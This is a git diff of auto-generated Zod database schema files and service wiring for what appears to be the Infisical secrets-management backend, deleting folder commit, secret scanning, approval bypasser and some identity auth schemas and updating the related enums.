  const folderCheckpointDAL = folderCheckpointDALFactory(db);
  const folderTreeCheckpointDAL = folderTreeCheckpointDALFactory(db);
  const userDAL = userDALFactory(db);
  const identityDAL = identityDALFactory(db);
  const folderDAL = secretFolderDALFactory(db);
  const folderVersionDAL = secretFolderVersionDALFactory(db);
  const secretVersionV2BridgeDAL = secretVersionV2BridgeDALFactory(db);
  const folderCheckpointResourcesDAL = folderCheckpointResourcesDALFactory(db);
  const secretV2BridgeDAL = secretV2BridgeDALFactory({ db, keyStore });
  const folderTreeCheckpointResourcesDAL = folderTreeCheckpointResourcesDALFactory(db);
  const secretTagDAL = secretTagDALFactory(db);

  const orgDAL = orgDALFactory(db);
  const kmsRootConfigDAL = kmsRootConfigDALFactory(db);
  const kmsDAL = kmskeyDALFactory(db);
  const internalKmsDAL = internalKmsDALFactory(db);
  const resourceMetadataDAL = resourceMetadataDALFactory(db);

  const hsmModule = initializeHsmModule(envConfig);
  hsmModule.initialize();

  const hsmService = hsmServiceFactory({
    hsmModule: hsmModule.getModule(),
    envConfig
  });

  const kmsService = kmsServiceFactory({
    kmsRootConfigDAL,
    keyStore,
    kmsDAL,
    internalKmsDAL,
    orgDAL,
    projectDAL,
    hsmService,
    envConfig
  });

  await hsmService.startService();
  await kmsService.startService();

  const folderCommitService = folderCommitServiceFactory({
    folderCommitDAL,
    folderCommitChangesDAL,
    folderCheckpointDAL,
    folderTreeCheckpointDAL,
    userDAL,
    identityDAL,
    folderDAL,
    folderVersionDAL,
    secretVersionV2BridgeDAL,
    projectDAL,
    folderCheckpointResourcesDAL,
    secretV2BridgeDAL,
    folderTreeCheckpointResourcesDAL,
    kmsService,
    secretTagDAL,
    resourceMetadataDAL
  });

  return { folderCommitService };
};
@ -13,9 +13,7 @@ export const AccessApprovalPoliciesApproversSchema = z.object({
  createdAt: z.date(),
  updatedAt: z.date(),
  approverUserId: z.string().uuid().nullable().optional(),
  approverGroupId: z.string().uuid().nullable().optional(),
  sequence: z.number().default(1).nullable().optional(),
  approvalsRequired: z.number().nullable().optional()
  approverGroupId: z.string().uuid().nullable().optional()
});

export type TAccessApprovalPoliciesApprovers = z.infer<typeof AccessApprovalPoliciesApproversSchema>;
@ -1,26 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { TImmutableDBKeys } from "./models";

export const AccessApprovalPoliciesBypassersSchema = z.object({
  id: z.string().uuid(),
  bypasserGroupId: z.string().uuid().nullable().optional(),
  bypasserUserId: z.string().uuid().nullable().optional(),
  policyId: z.string().uuid(),
  createdAt: z.date(),
  updatedAt: z.date()
});

export type TAccessApprovalPoliciesBypassers = z.infer<typeof AccessApprovalPoliciesBypassersSchema>;
export type TAccessApprovalPoliciesBypassersInsert = Omit<
  z.input<typeof AccessApprovalPoliciesBypassersSchema>,
  TImmutableDBKeys
>;
export type TAccessApprovalPoliciesBypassersUpdate = Partial<
  Omit<z.input<typeof AccessApprovalPoliciesBypassersSchema>, TImmutableDBKeys>
>;
@ -11,7 +11,7 @@ export const AccessApprovalPoliciesSchema = z.object({
  id: z.string().uuid(),
  name: z.string(),
  approvals: z.number().default(1),
  secretPath: z.string(),
  secretPath: z.string().nullable().optional(),
  envId: z.string().uuid(),
  createdAt: z.date(),
  updatedAt: z.date(),
@ -18,9 +18,7 @@ export const AccessApprovalRequestsSchema = z.object({
  createdAt: z.date(),
  updatedAt: z.date(),
  requestedByUserId: z.string().uuid(),
  note: z.string().nullable().optional(),
  privilegeDeletedAt: z.date().nullable().optional(),
  status: z.string().default("pending")
  note: z.string().nullable().optional()
});

export type TAccessApprovalRequests = z.infer<typeof AccessApprovalRequestsSchema>;
@ -12,8 +12,8 @@ export const CertificateAuthoritiesSchema = z.object({
  createdAt: z.date(),
  updatedAt: z.date(),
  projectId: z.string(),
  status: z.string(),
  enableDirectIssuance: z.boolean().default(true),
  status: z.string(),
  name: z.string()
});

@ -25,8 +25,8 @@ export const CertificatesSchema = z.object({
  certificateTemplateId: z.string().uuid().nullable().optional(),
  keyUsages: z.string().array().nullable().optional(),
  extendedKeyUsages: z.string().array().nullable().optional(),
  projectId: z.string(),
  pkiSubscriberId: z.string().uuid().nullable().optional()
  pkiSubscriberId: z.string().uuid().nullable().optional(),
  projectId: z.string()
});

export type TCertificates = z.infer<typeof CertificatesSchema>;
@ -16,8 +16,7 @@ export const DynamicSecretLeasesSchema = z.object({
  statusDetails: z.string().nullable().optional(),
  dynamicSecretId: z.string().uuid(),
  createdAt: z.date(),
  updatedAt: z.date(),
  config: z.unknown().nullable().optional()
  updatedAt: z.date()
});

export type TDynamicSecretLeases = z.infer<typeof DynamicSecretLeasesSchema>;
@ -28,8 +28,7 @@ export const DynamicSecretsSchema = z.object({
  updatedAt: z.date(),
  encryptedInput: zodBuffer,
  projectGatewayId: z.string().uuid().nullable().optional(),
  gatewayId: z.string().uuid().nullable().optional(),
  usernameTemplate: z.string().nullable().optional()
  gatewayId: z.string().uuid().nullable().optional()
});

export type TDynamicSecrets = z.infer<typeof DynamicSecretsSchema>;
@ -1,23 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { TImmutableDBKeys } from "./models";

export const FolderCheckpointResourcesSchema = z.object({
  id: z.string().uuid(),
  folderCheckpointId: z.string().uuid(),
  secretVersionId: z.string().uuid().nullable().optional(),
  folderVersionId: z.string().uuid().nullable().optional(),
  createdAt: z.date(),
  updatedAt: z.date()
});

export type TFolderCheckpointResources = z.infer<typeof FolderCheckpointResourcesSchema>;
export type TFolderCheckpointResourcesInsert = Omit<z.input<typeof FolderCheckpointResourcesSchema>, TImmutableDBKeys>;
export type TFolderCheckpointResourcesUpdate = Partial<
  Omit<z.input<typeof FolderCheckpointResourcesSchema>, TImmutableDBKeys>
>;
@ -1,19 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { TImmutableDBKeys } from "./models";

export const FolderCheckpointsSchema = z.object({
  id: z.string().uuid(),
  folderCommitId: z.string().uuid(),
  createdAt: z.date(),
  updatedAt: z.date()
});

export type TFolderCheckpoints = z.infer<typeof FolderCheckpointsSchema>;
export type TFolderCheckpointsInsert = Omit<z.input<typeof FolderCheckpointsSchema>, TImmutableDBKeys>;
export type TFolderCheckpointsUpdate = Partial<Omit<z.input<typeof FolderCheckpointsSchema>, TImmutableDBKeys>>;
@ -1,23 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { TImmutableDBKeys } from "./models";

export const FolderCommitChangesSchema = z.object({
  id: z.string().uuid(),
  folderCommitId: z.string().uuid(),
  changeType: z.string(),
  isUpdate: z.boolean().default(false),
  secretVersionId: z.string().uuid().nullable().optional(),
  folderVersionId: z.string().uuid().nullable().optional(),
  createdAt: z.date(),
  updatedAt: z.date()
});

export type TFolderCommitChanges = z.infer<typeof FolderCommitChangesSchema>;
export type TFolderCommitChangesInsert = Omit<z.input<typeof FolderCommitChangesSchema>, TImmutableDBKeys>;
export type TFolderCommitChangesUpdate = Partial<Omit<z.input<typeof FolderCommitChangesSchema>, TImmutableDBKeys>>;
@ -1,24 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { TImmutableDBKeys } from "./models";

export const FolderCommitsSchema = z.object({
  id: z.string().uuid(),
  commitId: z.coerce.bigint(),
  actorMetadata: z.unknown(),
  actorType: z.string(),
  message: z.string().nullable().optional(),
  folderId: z.string().uuid(),
  envId: z.string().uuid(),
  createdAt: z.date(),
  updatedAt: z.date()
});

export type TFolderCommits = z.infer<typeof FolderCommitsSchema>;
export type TFolderCommitsInsert = Omit<z.input<typeof FolderCommitsSchema>, TImmutableDBKeys>;
export type TFolderCommitsUpdate = Partial<Omit<z.input<typeof FolderCommitsSchema>, TImmutableDBKeys>>;
|
@ -1,26 +0,0 @@
|
||||
// Code generated by automation script, DO NOT EDIT.
|
||||
// Automated by pulling database and generating zod schema
|
||||
// To update. Just run npm run generate:schema
|
||||
// Written by akhilmhdh.
|
||||
|
||||
import { z } from "zod";
|
||||
|
||||
import { TImmutableDBKeys } from "./models";
|
||||
|
||||
export const FolderTreeCheckpointResourcesSchema = z.object({
|
||||
id: z.string().uuid(),
|
||||
folderTreeCheckpointId: z.string().uuid(),
|
||||
folderId: z.string().uuid(),
|
||||
folderCommitId: z.string().uuid(),
|
||||
createdAt: z.date(),
|
||||
updatedAt: z.date()
|
||||
});
|
||||
|
||||
export type TFolderTreeCheckpointResources = z.infer<typeof FolderTreeCheckpointResourcesSchema>;
|
||||
export type TFolderTreeCheckpointResourcesInsert = Omit<
|
||||
z.input<typeof FolderTreeCheckpointResourcesSchema>,
|
||||
TImmutableDBKeys
|
||||
>;
|
||||
export type TFolderTreeCheckpointResourcesUpdate = Partial<
|
||||
Omit<z.input<typeof FolderTreeCheckpointResourcesSchema>, TImmutableDBKeys>
|
||||
>;
|
@ -1,19 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { TImmutableDBKeys } from "./models";

export const FolderTreeCheckpointsSchema = z.object({
  id: z.string().uuid(),
  folderCommitId: z.string().uuid(),
  createdAt: z.date(),
  updatedAt: z.date()
});

export type TFolderTreeCheckpoints = z.infer<typeof FolderTreeCheckpointsSchema>;
export type TFolderTreeCheckpointsInsert = Omit<z.input<typeof FolderTreeCheckpointsSchema>, TImmutableDBKeys>;
export type TFolderTreeCheckpointsUpdate = Partial<Omit<z.input<typeof FolderTreeCheckpointsSchema>, TImmutableDBKeys>>;
@ -12,8 +12,7 @@ export const IdentitiesSchema = z.object({
  name: z.string(),
  authMethod: z.string().nullable().optional(),
  createdAt: z.date(),
  updatedAt: z.date(),
  hasDeleteProtection: z.boolean().default(false)
  updatedAt: z.date()
});

export type TIdentities = z.infer<typeof IdentitiesSchema>;
@ -1,25 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { TImmutableDBKeys } from "./models";

export const IdentityAlicloudAuthsSchema = z.object({
  id: z.string().uuid(),
  accessTokenTTL: z.coerce.number().default(7200),
  accessTokenMaxTTL: z.coerce.number().default(7200),
  accessTokenNumUsesLimit: z.coerce.number().default(0),
  accessTokenTrustedIps: z.unknown(),
  createdAt: z.date(),
  updatedAt: z.date(),
  identityId: z.string().uuid(),
  type: z.string(),
  allowedArns: z.string()
});

export type TIdentityAlicloudAuths = z.infer<typeof IdentityAlicloudAuthsSchema>;
export type TIdentityAlicloudAuthsInsert = Omit<z.input<typeof IdentityAlicloudAuthsSchema>, TImmutableDBKeys>;
export type TIdentityAlicloudAuthsUpdate = Partial<Omit<z.input<typeof IdentityAlicloudAuthsSchema>, TImmutableDBKeys>>;
@ -18,7 +18,7 @@ export const IdentityKubernetesAuthsSchema = z.object({
  createdAt: z.date(),
  updatedAt: z.date(),
  identityId: z.string().uuid(),
  kubernetesHost: z.string().nullable().optional(),
  kubernetesHost: z.string(),
  encryptedCaCert: z.string().nullable().optional(),
  caCertIV: z.string().nullable().optional(),
  caCertTag: z.string().nullable().optional(),
@ -31,8 +31,7 @@ export const IdentityKubernetesAuthsSchema = z.object({
  encryptedKubernetesTokenReviewerJwt: zodBuffer.nullable().optional(),
  encryptedKubernetesCaCertificate: zodBuffer.nullable().optional(),
  gatewayId: z.string().uuid().nullable().optional(),
  accessTokenPeriod: z.coerce.number().default(0),
  tokenReviewMode: z.string().default("api")
  accessTokenPeriod: z.coerce.number().default(0)
});

export type TIdentityKubernetesAuths = z.infer<typeof IdentityKubernetesAuthsSchema>;
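The fields touched by this hunk lean on Zod defaults and coercion. As a rough illustration of the parse-time behavior (field names taken from the schema above, values invented):

// Sketch only -- field names from the schema above, values invented.
import { z } from "zod";

const subset = z.object({
  accessTokenPeriod: z.coerce.number().default(0),
  tokenReviewMode: z.string().default("api")
});

// Missing keys are filled from .default(); numeric strings are coerced.
console.log(subset.parse({}));
// => { accessTokenPeriod: 0, tokenReviewMode: "api" }
console.log(subset.parse({ accessTokenPeriod: "3600" }));
// => { accessTokenPeriod: 3600, tokenReviewMode: "api" }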
@ -1,27 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { zodBuffer } from "@app/lib/zod";

import { TImmutableDBKeys } from "./models";

export const IdentityTlsCertAuthsSchema = z.object({
  id: z.string().uuid(),
  accessTokenTTL: z.coerce.number().default(7200),
  accessTokenMaxTTL: z.coerce.number().default(7200),
  accessTokenNumUsesLimit: z.coerce.number().default(0),
  accessTokenTrustedIps: z.unknown(),
  createdAt: z.date(),
  updatedAt: z.date(),
  identityId: z.string().uuid(),
  allowedCommonNames: z.string().nullable().optional(),
  encryptedCaCertificate: zodBuffer
});

export type TIdentityTlsCertAuths = z.infer<typeof IdentityTlsCertAuthsSchema>;
export type TIdentityTlsCertAuthsInsert = Omit<z.input<typeof IdentityTlsCertAuthsSchema>, TImmutableDBKeys>;
export type TIdentityTlsCertAuthsUpdate = Partial<Omit<z.input<typeof IdentityTlsCertAuthsSchema>, TImmutableDBKeys>>;
@ -1,6 +1,5 @@
export * from "./access-approval-policies";
export * from "./access-approval-policies-approvers";
export * from "./access-approval-policies-bypassers";
export * from "./access-approval-requests";
export * from "./access-approval-requests-reviewers";
export * from "./api-keys";
@ -24,12 +23,6 @@ export * from "./dynamic-secrets";
export * from "./external-certificate-authorities";
export * from "./external-group-org-role-mappings";
export * from "./external-kms";
export * from "./folder-checkpoint-resources";
export * from "./folder-checkpoints";
export * from "./folder-commit-changes";
export * from "./folder-commits";
export * from "./folder-tree-checkpoint-resources";
export * from "./folder-tree-checkpoints";
export * from "./gateways";
export * from "./git-app-install-sessions";
export * from "./git-app-org";
@ -39,7 +32,6 @@ export * from "./group-project-memberships";
export * from "./groups";
export * from "./identities";
export * from "./identity-access-tokens";
export * from "./identity-alicloud-auths";
export * from "./identity-aws-auths";
export * from "./identity-azure-auths";
export * from "./identity-gcp-auths";
@ -52,7 +44,6 @@ export * from "./identity-org-memberships";
export * from "./identity-project-additional-privilege";
export * from "./identity-project-membership-role";
export * from "./identity-project-memberships";
export * from "./identity-tls-cert-auths";
export * from "./identity-token-auths";
export * from "./identity-ua-client-secrets";
export * from "./identity-universal-auths";
@ -101,7 +92,6 @@ export * from "./saml-configs";
export * from "./scim-tokens";
export * from "./secret-approval-policies";
export * from "./secret-approval-policies-approvers";
export * from "./secret-approval-policies-bypassers";
export * from "./secret-approval-request-secret-tags";
export * from "./secret-approval-request-secret-tags-v2";
export * from "./secret-approval-requests";
@ -119,12 +109,7 @@ export * from "./secret-rotation-outputs";
export * from "./secret-rotation-v2-secret-mappings";
export * from "./secret-rotations";
export * from "./secret-rotations-v2";
export * from "./secret-scanning-configs";
export * from "./secret-scanning-data-sources";
export * from "./secret-scanning-findings";
export * from "./secret-scanning-git-risks";
export * from "./secret-scanning-resources";
export * from "./secret-scanning-scans";
export * from "./secret-sharing";
export * from "./secret-snapshot-folders";
export * from "./secret-snapshot-secrets";
@ -80,13 +80,11 @@ export enum TableName {
  IdentityGcpAuth = "identity_gcp_auths",
  IdentityAzureAuth = "identity_azure_auths",
  IdentityUaClientSecret = "identity_ua_client_secrets",
  IdentityAliCloudAuth = "identity_alicloud_auths",
  IdentityAwsAuth = "identity_aws_auths",
  IdentityOciAuth = "identity_oci_auths",
  IdentityOidcAuth = "identity_oidc_auths",
  IdentityJwtAuth = "identity_jwt_auths",
  IdentityLdapAuth = "identity_ldap_auths",
  IdentityTlsCertAuth = "identity_tls_cert_auths",
  IdentityOrgMembership = "identity_org_memberships",
  IdentityProjectMembership = "identity_project_memberships",
  IdentityProjectMembershipRole = "identity_project_membership_role",
@ -97,12 +95,10 @@ export enum TableName {
  ScimToken = "scim_tokens",
  AccessApprovalPolicy = "access_approval_policies",
  AccessApprovalPolicyApprover = "access_approval_policies_approvers",
  AccessApprovalPolicyBypasser = "access_approval_policies_bypassers",
  AccessApprovalRequest = "access_approval_requests",
  AccessApprovalRequestReviewer = "access_approval_requests_reviewers",
  SecretApprovalPolicy = "secret_approval_policies",
  SecretApprovalPolicyApprover = "secret_approval_policies_approvers",
  SecretApprovalPolicyBypasser = "secret_approval_policies_bypassers",
  SecretApprovalRequest = "secret_approval_requests",
  SecretApprovalRequestReviewer = "secret_approval_requests_reviewers",
  SecretApprovalRequestSecret = "secret_approval_requests_secrets",
@ -161,21 +157,10 @@ export enum TableName {
  MicrosoftTeamsIntegrations = "microsoft_teams_integrations",
  ProjectMicrosoftTeamsConfigs = "project_microsoft_teams_configs",
  SecretReminderRecipients = "secret_reminder_recipients",
  GithubOrgSyncConfig = "github_org_sync_configs",
  FolderCommit = "folder_commits",
  FolderCommitChanges = "folder_commit_changes",
  FolderCheckpoint = "folder_checkpoints",
  FolderCheckpointResources = "folder_checkpoint_resources",
  FolderTreeCheckpoint = "folder_tree_checkpoints",
  FolderTreeCheckpointResources = "folder_tree_checkpoint_resources",
  SecretScanningDataSource = "secret_scanning_data_sources",
  SecretScanningResource = "secret_scanning_resources",
  SecretScanningScan = "secret_scanning_scans",
  SecretScanningFinding = "secret_scanning_findings",
  SecretScanningConfig = "secret_scanning_configs"
  GithubOrgSyncConfig = "github_org_sync_configs"
}

export type TImmutableDBKeys = "id" | "createdAt" | "updatedAt" | "commitId";
export type TImmutableDBKeys = "id" | "createdAt" | "updatedAt";

export const UserDeviceSchema = z
  .object({
@ -249,10 +234,8 @@ export enum IdentityAuthMethod {
  UNIVERSAL_AUTH = "universal-auth",
  KUBERNETES_AUTH = "kubernetes-auth",
  GCP_AUTH = "gcp-auth",
  ALICLOUD_AUTH = "alicloud-auth",
  AWS_AUTH = "aws-auth",
  AZURE_AUTH = "azure-auth",
  TLS_CERT_AUTH = "tls-cert-auth",
  OCI_AUTH = "oci-auth",
  OIDC_AUTH = "oidc-auth",
  JWT_AUTH = "jwt-auth",
@ -263,8 +246,16 @@ export enum ProjectType {
  SecretManager = "secret-manager",
  CertificateManager = "cert-manager",
  KMS = "kms",
  SSH = "ssh",
  SecretScanning = "secret-scanning"
  SSH = "ssh"
}

export enum ActionProjectType {
  SecretManager = ProjectType.SecretManager,
  CertificateManager = ProjectType.CertificateManager,
  KMS = ProjectType.KMS,
  SSH = ProjectType.SSH,
  // project operations that happen on all types
  Any = "any"
}

export enum SortDirection {
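The TImmutableDBKeys change above ripples through every generated Insert/Update alias: when "commitId" is part of the union, the Omit<...> helpers strip it, so callers cannot supply commit numbers and the database assigns them. A type-level sketch, where Row is a made-up stand-in for a generated schema output:

// Sketch only -- Row is an invented stand-in, not a generated type.
type WithCommitId = "id" | "createdAt" | "updatedAt" | "commitId";
type WithoutCommitId = "id" | "createdAt" | "updatedAt";

type Row = { id: string; commitId: bigint; message?: string; createdAt: Date; updatedAt: Date };

type InsertA = Omit<Row, WithCommitId>;    // { message?: string } -- commitId is DB-assigned
type InsertB = Omit<Row, WithoutCommitId>; // { commitId: bigint; message?: string }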
@ -18,8 +18,7 @@ export const OrgMembershipsSchema = z.object({
  orgId: z.string().uuid(),
  roleId: z.string().uuid().nullable().optional(),
  projectFavorites: z.string().array().nullable().optional(),
  isActive: z.boolean().default(true),
  lastInvitedAt: z.date().nullable().optional()
  isActive: z.boolean().default(true)
});

export type TOrgMemberships = z.infer<typeof OrgMembershipsSchema>;
@ -16,7 +16,7 @@ export const ProjectTemplatesSchema = z.object({
  orgId: z.string().uuid(),
  createdAt: z.date(),
  updatedAt: z.date(),
  type: z.string().nullable().optional()
  type: z.string().default("secret-manager")
});

export type TProjectTemplates = z.infer<typeof ProjectTemplatesSchema>;
@ -25,12 +25,10 @@ export const ProjectsSchema = z.object({
  kmsSecretManagerKeyId: z.string().uuid().nullable().optional(),
  kmsSecretManagerEncryptedDataKey: zodBuffer.nullable().optional(),
  description: z.string().nullable().optional(),
  type: z.string().nullable().optional(),
  type: z.string(),
  enforceCapitalization: z.boolean().default(false),
  hasDeleteProtection: z.boolean().default(false).nullable().optional(),
  secretSharing: z.boolean().default(true),
  showSnapshotsLegacy: z.boolean().default(false),
  defaultProduct: z.string().default("secret-manager")
  secretSharing: z.boolean().default(true)
});

export type TProjects = z.infer<typeof ProjectsSchema>;
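The two competing declarations of type in this hunk differ in what they accept at parse time: z.string().nullable().optional() tolerates null and missing values, while bare z.string() rejects both. A minimal check:

// Sketch only -- demonstrates the acceptance difference.
import { z } from "zod";

const loose = z.string().nullable().optional();
const strict = z.string();

console.log(loose.safeParse(undefined).success);  // true
console.log(loose.safeParse(null).success);       // true
console.log(strict.safeParse(undefined).success); // false
console.log(strict.safeParse(null).success);      // false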
@ -1,26 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { TImmutableDBKeys } from "./models";

export const SecretApprovalPoliciesBypassersSchema = z.object({
  id: z.string().uuid(),
  bypasserGroupId: z.string().uuid().nullable().optional(),
  bypasserUserId: z.string().uuid().nullable().optional(),
  policyId: z.string().uuid(),
  createdAt: z.date(),
  updatedAt: z.date()
});

export type TSecretApprovalPoliciesBypassers = z.infer<typeof SecretApprovalPoliciesBypassersSchema>;
export type TSecretApprovalPoliciesBypassersInsert = Omit<
  z.input<typeof SecretApprovalPoliciesBypassersSchema>,
  TImmutableDBKeys
>;
export type TSecretApprovalPoliciesBypassersUpdate = Partial<
  Omit<z.input<typeof SecretApprovalPoliciesBypassersSchema>, TImmutableDBKeys>
>;
@ -10,7 +10,7 @@ import { TImmutableDBKeys } from "./models";
export const SecretApprovalPoliciesSchema = z.object({
  id: z.string().uuid(),
  name: z.string(),
  secretPath: z.string(),
  secretPath: z.string().nullable().optional(),
  approvals: z.number().default(1),
  envId: z.string().uuid(),
  createdAt: z.date(),
@ -18,7 +18,7 @@ export const SecretApprovalRequestsSchema = z.object({
  createdAt: z.date(),
  updatedAt: z.date(),
  isReplicated: z.boolean().nullable().optional(),
  committerUserId: z.string().uuid().nullable().optional(),
  committerUserId: z.string().uuid(),
  statusChangedByUserId: z.string().uuid().nullable().optional(),
  bypassReason: z.string().nullable().optional()
});
@ -14,8 +14,7 @@ export const SecretFolderVersionsSchema = z.object({
  createdAt: z.date(),
  updatedAt: z.date(),
  envId: z.string().uuid(),
  folderId: z.string().uuid(),
  description: z.string().nullable().optional()
  folderId: z.string().uuid()
});

export type TSecretFolderVersions = z.infer<typeof SecretFolderVersionsSchema>;
@ -1,20 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { TImmutableDBKeys } from "./models";

export const SecretScanningConfigsSchema = z.object({
  id: z.string().uuid(),
  projectId: z.string(),
  content: z.string().nullable().optional(),
  createdAt: z.date(),
  updatedAt: z.date()
});

export type TSecretScanningConfigs = z.infer<typeof SecretScanningConfigsSchema>;
export type TSecretScanningConfigsInsert = Omit<z.input<typeof SecretScanningConfigsSchema>, TImmutableDBKeys>;
export type TSecretScanningConfigsUpdate = Partial<Omit<z.input<typeof SecretScanningConfigsSchema>, TImmutableDBKeys>>;
@ -1,32 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { zodBuffer } from "@app/lib/zod";

import { TImmutableDBKeys } from "./models";

export const SecretScanningDataSourcesSchema = z.object({
  id: z.string().uuid(),
  externalId: z.string().nullable().optional(),
  name: z.string(),
  description: z.string().nullable().optional(),
  type: z.string(),
  config: z.unknown(),
  encryptedCredentials: zodBuffer.nullable().optional(),
  connectionId: z.string().uuid().nullable().optional(),
  isAutoScanEnabled: z.boolean().default(true).nullable().optional(),
  projectId: z.string(),
  createdAt: z.date(),
  updatedAt: z.date(),
  isDisconnected: z.boolean().default(false)
});

export type TSecretScanningDataSources = z.infer<typeof SecretScanningDataSourcesSchema>;
export type TSecretScanningDataSourcesInsert = Omit<z.input<typeof SecretScanningDataSourcesSchema>, TImmutableDBKeys>;
export type TSecretScanningDataSourcesUpdate = Partial<
  Omit<z.input<typeof SecretScanningDataSourcesSchema>, TImmutableDBKeys>
>;
@ -1,32 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { TImmutableDBKeys } from "./models";

export const SecretScanningFindingsSchema = z.object({
  id: z.string().uuid(),
  dataSourceName: z.string(),
  dataSourceType: z.string(),
  resourceName: z.string(),
  resourceType: z.string(),
  rule: z.string(),
  severity: z.string(),
  status: z.string().default("unresolved"),
  remarks: z.string().nullable().optional(),
  fingerprint: z.string(),
  details: z.unknown(),
  projectId: z.string(),
  scanId: z.string().uuid().nullable().optional(),
  createdAt: z.date(),
  updatedAt: z.date()
});

export type TSecretScanningFindings = z.infer<typeof SecretScanningFindingsSchema>;
export type TSecretScanningFindingsInsert = Omit<z.input<typeof SecretScanningFindingsSchema>, TImmutableDBKeys>;
export type TSecretScanningFindingsUpdate = Partial<
  Omit<z.input<typeof SecretScanningFindingsSchema>, TImmutableDBKeys>
>;
@ -1,24 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { TImmutableDBKeys } from "./models";

export const SecretScanningResourcesSchema = z.object({
  id: z.string().uuid(),
  externalId: z.string(),
  name: z.string(),
  type: z.string(),
  dataSourceId: z.string().uuid(),
  createdAt: z.date(),
  updatedAt: z.date()
});

export type TSecretScanningResources = z.infer<typeof SecretScanningResourcesSchema>;
export type TSecretScanningResourcesInsert = Omit<z.input<typeof SecretScanningResourcesSchema>, TImmutableDBKeys>;
export type TSecretScanningResourcesUpdate = Partial<
  Omit<z.input<typeof SecretScanningResourcesSchema>, TImmutableDBKeys>
>;
@ -1,21 +0,0 @@
// Code generated by automation script, DO NOT EDIT.
// Automated by pulling database and generating zod schema
// To update. Just run npm run generate:schema
// Written by akhilmhdh.

import { z } from "zod";

import { TImmutableDBKeys } from "./models";

export const SecretScanningScansSchema = z.object({
  id: z.string().uuid(),
  status: z.string().default("queued"),
  statusMessage: z.string().nullable().optional(),
  type: z.string(),
  resourceId: z.string().uuid(),
  createdAt: z.date().nullable().optional()
});

export type TSecretScanningScans = z.infer<typeof SecretScanningScansSchema>;
export type TSecretScanningScansInsert = Omit<z.input<typeof SecretScanningScansSchema>, TImmutableDBKeys>;
export type TSecretScanningScansUpdate = Partial<Omit<z.input<typeof SecretScanningScansSchema>, TImmutableDBKeys>>;
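As with the other deleted scanning schemas, defaults and optional fields determine what a bare parse yields. A small hedged example against the shape above:

// Sketch only -- a subset of the schema above.
import { z } from "zod";

const scanSubset = z.object({
  status: z.string().default("queued"),
  createdAt: z.date().nullable().optional()
});

// An empty object is valid: status falls back to "queued" and the
// nullable().optional() createdAt is simply omitted from the result.
console.log(scanSubset.parse({})); // { status: "queued" }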
Some files were not shown because too many files have changed in this diff.